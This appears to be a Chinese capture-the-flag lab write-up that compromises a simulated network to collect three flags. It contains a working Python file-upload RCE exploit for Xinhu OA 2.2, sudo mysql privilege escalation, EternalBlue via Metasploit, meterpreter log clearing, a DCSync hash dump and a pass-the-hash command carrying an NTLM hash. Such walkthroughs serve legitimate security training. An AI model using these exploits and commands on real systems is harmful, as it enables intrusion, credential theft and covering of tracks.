flag1

第一步用tscan扫描指纹发现是thinkphp

然后直接getshell

img

蚁剑连接后sudo -l发现mysql提权

img

1
sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null'

然后得到flag1

1
flag{60b53231-

flag2

传入fscan来扫描一下内网

1
fscan -h

然后用stowaway做一个内网穿透

img

弱口令可以进入到这里

然后是信呼协同办公2.2版本的文件上传

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests


session = requests.session()

url_pre = 'http://url/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'dGVzdA::',
    'adminpass': 'YWJjMTIz',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(r.text)

记得改账户密码

img

蚁剑连接上,查看flag2

1
2ce3-4813-87d4-

flag3

img

我们可以试一下永恒之蓝

配置好kali的代理

启动msf

1
proxychains4 msfconsole

选好模块,配置好ip进行攻击

1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

img

1
2
3
4
5
meterpreter > screenshot # 捕获屏幕
meterpreter > upload hello.txt c:// #上传文件
meterpreter > download d://1.txt # 下载文件
meterpreter > shell # 获取cmd
meterpreter > clearev # 清除日志

这里是一些命令

但是这里没有flag,还有一个可利用的点就是

img

这里有一个dc的域控制器,需要打DCSync

这里直接贴一位佬的介绍了

imgimg

这里我们符合条件打dcsync,输入一下命令获取用户的hash

1
2
load kiwi  # 调用mimikatz模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit  # 导出域内所有用户的信息(包括哈希值)

img

获取到用户的hash

接下来我们需要使用crackmapexec来进行哈希传递攻击,从而实现在dc域控上的任意命令执行来获得flag3

1
crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

img

1
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

参考:https://9anux.org/2024/08/01/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83Initial%E8%AF%A6%E8%A7%A3/index.html